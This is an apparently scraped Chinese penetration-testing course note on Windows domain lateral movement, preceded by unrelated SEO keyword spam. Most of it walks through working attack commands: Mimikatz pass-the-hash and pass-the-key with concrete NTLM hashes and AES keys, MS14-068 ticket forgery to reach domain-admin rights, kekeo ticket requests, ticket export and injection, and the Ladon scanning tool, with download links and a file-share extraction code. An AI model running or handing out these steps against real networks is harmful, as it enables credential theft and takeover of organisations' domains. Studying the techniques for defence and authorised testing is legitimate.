网站策划书10个点怎么写,中元建设网站,无锡网站外包,表白网页制作网站目录 演示案例:域横向移动PTH传递-Mimikatz域横向移动PTK传递-Mimikatz域横向移动PTT传递-MS14068kekeolocal国产Ladon内网杀器测试验收-信息收集,连接等 涉及资源: PTH(pass the hash) #利用lm或ntlm的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证TGT进行… 目录 演示案例:域横向移动PTH传递-Mimikatz域横向移动PTK传递-Mimikatz域横向移动PTT传递-MS14068kekeolocal国产Ladon内网杀器测试验收-信息收集,连接等 涉及资源: PTH(pass the hash) #利用lm或ntlm的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证TGT进行的渗透测试 PTK(pass the key) #利用的ekeys aes256进行的渗透测试
#PTH在内网渗透中是一种很经典的攻击方式原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务而不用提供明文密码。 如果禁用了ntlm认证PsExec无法利用获得的ntlm hash进行远程连接但是使用mimikatz还是可以攻击成功。对于8.1/2012r2安装补丁kb2871997的win7/2008r2/8/2012等可以使用AES keys代替NT hash来实现ptk攻击 总结: KB2871997补丁后的影响 pth: 没打补丁用户都可以连接打了补丁只能administrator连接 ptk: 打了补丁才能用户都可以连接采用aes256连接 KB22871997是否真的能防御PTH攻击 https://www.freebuf.com/column/220740.html 打了补丁之后PTH还是能够攻击只是攻击被缩小了只能连接administrator域账户无法攻击成功但是本地账户仍然能够攻击成功 输入systeminfo就知道他有没有打补丁前期的信息收集我们需要做到心中有数 NTLM Hash和AES keys密码加密算法不一样但都是属于密码的一种加密形式只是不同的加密算法也就是说可以利用这两个算法的值来实现攻击
PTT票据就好比我们网站的cookie我们就可以把票据理解成cookie的一个概念就是说你在登录过这个主机之后它是会产生一个cookie或者说有跟别人建立连接的这个凭据在你这个电脑上面这个时候你就有票据进行重新连接
PTH和PTK做为一个连接协议是一样的然而PTT协议不一样它是用Kerberos协议这就是他们主要的区别
#PTT攻击的部分就不是简单的NTLM认证了它是利用Kerberos协议进行攻击的这里就介绍三种常见的攻击方法: MS14-068Golden ticketSILVER ticket简单来说就是将连接合法的票据注入到内存中实现连接。 MS14-068基于漏洞Golden ticket(黄金票据)SILVER ticket(白银票据) 其中Golden ticket(黄金票据)SILVER ticket(白银票据)属于权限维持技术 MS14-068造成的危害是允许域内任何一个普通用户将自己提升至域管权限。微软给出的补丁是kb3011780
权限维持是属于我们已经拿下权限然后进行维持
演示案例:
域横向移动PTH传递-Mimikatz
Mimikatz不仅是凭据的获取工具还是是获取明文密码的工具另外还可以进行相关的攻击
在实战情况下最好LM、HTLM这两个数据都收集一下避免在域环境有利用LM这个协议验证的考虑要严谨点
PTH ntIm传递
未打补丁下的工作组及域连接
sekurlsa::pth /user:administrator /domain:god/ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c我们首先攻击域控 这个就是明显没有连接上因为你没有凭据我们去尝试webserver 执行成功之后会自动弹窗 这个就好比at、schtasks复制文件执行文件等等来实现一些过去的操作这个就是典型的mimikatz上的攻击 如果连接IP地址不识别的话可以换成计算机名 建立连接的PTH窗口反弹连接客户端连上去就完事了 3.21是域控的地址而我们在攻击的时候我没有指向IP地址那如果在实战情况下的话域控的地址需要我们去测试在实战情况下相当于是一种随机的攻击前期的IP地址是需要我们去收集的 有的用户跟我们同一个网络的话我们可以把域改成workgroup连接本地用户因为每台计算机上面会有几个用户不要光对域内用户进行渗透同样这个本地上的用户也可以做为测试的目标那我们在批量的时候就要改成workgroup连接本地用户
域横向移动PTK传递-Mimikatz
PTK aes256传递 打补丁KB2871997后的工作组及域连接:
sekurlsa::ekeys #获取aes
sekurlsa::pth /user:mary /domain:god.org /aes256:d7c1d9310753a2f7f240e5b2701d1e6177d16a6e40af3c5cdff814719821c4bPTK用aes连接的话他必须打补丁才能有用你不打补丁连接不上去 我们的思路就是如果对方打了补丁的话一种就是PTH administrator连接采用的连接凭据就是ntlm hash或者是LM Hash于此同时还能用PTK连接 在渗透中要做加密值的批量枚举判断爆破的时候我们就要搞清楚了 他不打补丁的话无法用aes连接
域横向移动PTT传递-MS14068kekeolocal
MS14-068利用的是PTT攻击这里就涉及到三类攻击技巧一种是用漏洞生成的一种是用工具生成的还有一种本地生成的 主要是漏洞这块像这个工具和本地是属于后期没办法的时候漏洞在失效的时候没有这个漏洞的时候的一种攻击手法 第一种利用漏洞 能实现普通用户直接获取域控system权限 #MS14-068 powershell执行 1.查看当前sid whoami/user 2.mimikatz # kerberos::purge //清空当前机器中所有凭证如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件 //将票据注入到内存中3.利用ms14-068生成TGT数据 ms14-068.exe -u 域成员名域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u marygod.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!#45TGT数据就是票据 4.票据注入内存
mimikatz.exe kerberos::ptc TGT_marygod.org.ccache exit这个过程有点类似于web攻击里面的cookie欺骗我拿到管理员的cookie之后我是把cookie写到访问浏览器的信息里面这个票据注入内存和那个操作是一样的 5.查看凭证列表 klist 6.利用
dir \\192.168.3.21\c$票据传递原理他其实就是生成合法的连接请求我们在通过mimikatz导入到我内存去所以我连接的时候就不需要输入账号密码其实就是我已经和他建立连接了票据就好比我们web渗透的cookie信息也就是说在域内主机存在漏洞的话我们就可以利用票据传递攻击 第二种利用工具kekeo 1.生成票据
kekeo tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c2.导入票据
kerberos::ptt TGT_maryGOD.ORG_krbtqt~god.orgGOD.ORG.kirbi3.查看凭证 klist 4.利用net use载入
dir \\192.168.3.21\c$第三种利用本地票据(需管理权限)
sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi伪造cookie的攻击思路他首先利用mimikatz把本地的票据把他给收集起来收集起来在导入到内存里面连接 我在的计算机有连接过域控那么他就会有一些类似的储存缓存行为文件在我的计算机上面把以前的一些凭据文件给导出来然后在把之前跟域控建立连接的文件给导入到内存里面去相当于说把以前你的cookie把他搂出来去尝试这个cookie他是不是还可以用这个攻击需要本地管理员权限因为他涉及到导出票据所以说你的权限不够的话这个攻击是做不了的前面那两个就不需要权限 这种在实战情况下面有时候这个攻击还有点用但是大部分也没太大用有点鸡肋因为这个PTT有个缺点你建立之后只有10小时的存活时间 如果你这台计算机曾经有人在10个小时之内有人用你的计算机登陆过域控那么这个时候就有如果超过10个小时的话你在导出来就没什么作用了和我们cookie的存活时间是一个意思可能密码一修改cookie就变了也有这个原因PTH的存活时间就是10小时别人连接的10个小时内你拿到这个东西所以它鸡肋的地方就在这里
总结: ptt传递不需本地管理员权限连接时主机名连接基于漏洞工具本地票据
权限维持就是在攻击之后把这个本机的票据全部储存下来然后修改它一些存活时间我们以后就能用这个票据文件其实就是把对方的cookie劫获到之后保证cookie的存活性后期我们就用cookie进入开个后门的意思
国产Ladon内网杀器测试验收-信息收集,连接等
信息收集-协议扫描-漏洞探针-传递攻击等 ladon和打枪工具CS、MSF都是可以相互结合的 GUI版本是我们图形化版本因为大部分在实战中是在shell里面我们用GUI的可能性不大但是这个GUI可以在本地用在本地打开 存活主机扫描 批量检测有没有MS17010漏洞 看那些端口开了可以进行SMB连接那些IP支持SMB连接的情况 其实就是把我们前面说的信息收集、利用工具都打包到这个里面去了你如果在实战中的话只需要上传这款工具的exe版然后在里面运行exe就能实现横向渗透各种协议的里面都内置了把功能全部写进去了而且用命令能实现信息收集、漏洞探针、漏洞利用、横向渗透
涉及资源:
https://github.com/k8gege/Ladon https://github.com/gentilkiwi/kekeo/releases https://github.com/abatchy17/indowsExploits/tree/master/MS14-068 https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw提取码:xiao
